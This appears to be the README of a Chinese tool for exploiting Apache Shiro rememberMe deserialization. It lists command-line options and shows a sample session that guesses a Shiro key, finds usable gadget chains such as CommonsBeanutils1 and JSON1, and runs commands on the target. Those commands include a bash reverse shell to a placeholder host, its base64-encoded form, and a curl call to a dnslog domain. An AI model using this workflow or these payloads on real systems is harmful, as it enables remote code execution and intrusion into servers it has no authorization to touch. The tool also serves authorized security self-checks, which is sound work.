
shiro 反序列 命令执行辅助检测工具


声明: 此工具仅用于企业安全人员自查验证自身企业资产的安全风险,或有合法授权的安全测试,请勿用于其他用途,如有,后果自负。


1、spring/tomcat回显,执行命令的时候,x=whoami 就行
4、key 目前 401 个。
5、默认会加载当前目录下的 keys.txt 文件,可以把key放到keys.txt里,和该jar放同一个目录,会自动加载。

> java -jar shiro_tool.jar
Usage: java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck     --> skip check target is shiro or not.
skip        --> all gadget default can be use
redirect    --> follow redirect default:false
randomagent --> random useragent
notcheckall --> not check all gadget
useragent=  --> set useragent
cookiename= --> default: rememberMe      不是rememberMe的时候用
x=          --> print result
cmd=        --> set command to run
dcmd=       --> set command to run, command format base64 string
key=        --> set a shiro key
req=        --> request body file   request body file 抓包保存到文件里,这里写文件名
keys=       --> keys file       自定义key的文件,key按行分割,即每行写一个
java -cp shiro_tool.jar shiro.Check urls=批量url文件  redirect
java -cp shiro_tool.jar shiro.Check http://www.shiro.com

[admin@ shiro] java -jar shiro_tool.jar https://xx.xx.xx.xx/          
[-] target: https://xx.xx.xx.xx/
[-] target is use shiro
[-] start guess shiro key.
[-] shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check URLDNS
[*] find: URLDNS can be use
[-] check CommonsBeanutils1
[*] find: CommonsBeanutils1 can be use
[-] check CommonsBeanutils2
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[-] check CommonsCollectionsK1
[-] check CommonsCollectionsK2
[-] check CommonsCollectionsK3
[-] check CommonsCollectionsK4
[-] check Groovy1
[*] find: Groovy1 can be use
[-] check JSON1
[*] find: JSON1 can be use
[-] check Spring1
[*] find: Spring1 can be use
[-] check Spring2
[-] check JRMPClient
[*] find: JRMPClient can be use
[*] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener 
1: CommonsBeanutils1
2: Groovy1
3: JSON1
4: Spring1
5: JRMPClient
[-] please enter the number(0-6)
[-] use gadget: JSON1
[*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[*] command example: curl dnslog.xx.com
[*] if need base64 command, input should startwith bash=/powershell=/python=/perl= 
[-] please enter command, input q or quit to quit
> curl json.dnslog.xx.cn
[-] start process command: curl json.dnslog.xx.cn
[-] please enter command, input q or quit to quit
> bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[-] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
[-] please enter command, input q or quit to quit
> output=on
[-] print payload mode on.
[-] please enter command, enter q or quit to quit, enter back to re-choose gadget
> whoami
kPH+bIxk5D2deZiIxcaaaA== - CommonsBeanutils1 - zEC2T+ZP+ib2g+NLMrrU0LRsNu3lr7kjq
[-] please enter command, enter q or quit to quit, enter back to re-choose gadget
> x=whoami

[-] please enter command, enter q or quit to quit, enter back to re-choose gadget
> quit
[-] start process command: quit
[-] quit